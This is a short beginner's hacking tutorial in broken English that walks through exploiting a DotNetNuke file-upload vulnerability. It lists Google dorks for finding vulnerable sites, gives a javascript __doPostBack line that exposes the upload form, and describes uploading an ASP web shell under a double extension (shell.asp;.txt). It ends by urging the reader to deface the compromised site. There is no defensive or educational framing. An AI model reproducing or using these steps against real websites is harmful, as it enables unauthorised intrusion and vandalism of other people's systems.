DNN Attack For Beginners

DNN stands for Dot Net Nuke. It have an remote arbitrary File Upload vulnerability. simply said iploading

vulnerrability.

Finding vulnerable websites

Find vulnerable websites by GOOGLE dorks :

inurl:/fck/fcklinkgallery.aspx

inurl:/tabid/36/language/en-US/Default.aspx

I got a target

Select "File" from list.

The in url bar paste the javascript ;

javascript:__doPostBack('ctlURL$cmdUpload','')

Now there appear a uploading bar on page. As seen be below :

Now upload your ASP shell as "shell.asp;.txt , shell.asp;.jpg"
your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"

Now you have a Shell Access to the website . Now deface the website.
Hope You Enjoy....!

MUBASHIRSOFT